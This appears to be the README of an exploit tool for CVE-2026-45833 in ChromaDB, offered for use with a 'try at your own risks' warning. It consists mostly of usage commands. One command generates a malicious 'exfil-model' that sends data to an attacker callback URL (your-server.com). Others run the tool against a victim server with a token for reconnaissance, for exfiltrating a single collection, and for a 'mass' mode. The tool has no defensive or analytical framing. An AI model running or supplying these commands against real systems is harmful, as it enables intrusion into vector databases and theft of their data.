
Exploit tool for CVE-2026-45833 in ChromaDB, enabling malicious model generation, reconnaissance, and data exfiltration from target collections via HTTP API.
CVE-2026-45833 ChromaDB TRY AT YOUR OWN RISKS SOME CODE NEED TO MODIFY.
python3 -c " from main import MaliciousModelGenerator gen = MaliciousModelGenerator() gen.generate_model('exfil-model', 'exfil_env', { 'exfil_url': 'http://your-server.com/callback' }) "
python3 main.py --target http://victim:8000
--token "eyJ..."
--action recon
python3 main.py --target http://victim:8000
--token "eyJ..."
--collection "coll-id-here"
--model "your-username/exfil-model"
python3 main.py --target http://victim:8000
--token "eyJ..."
--action mass
--model "your-username/exfil-model"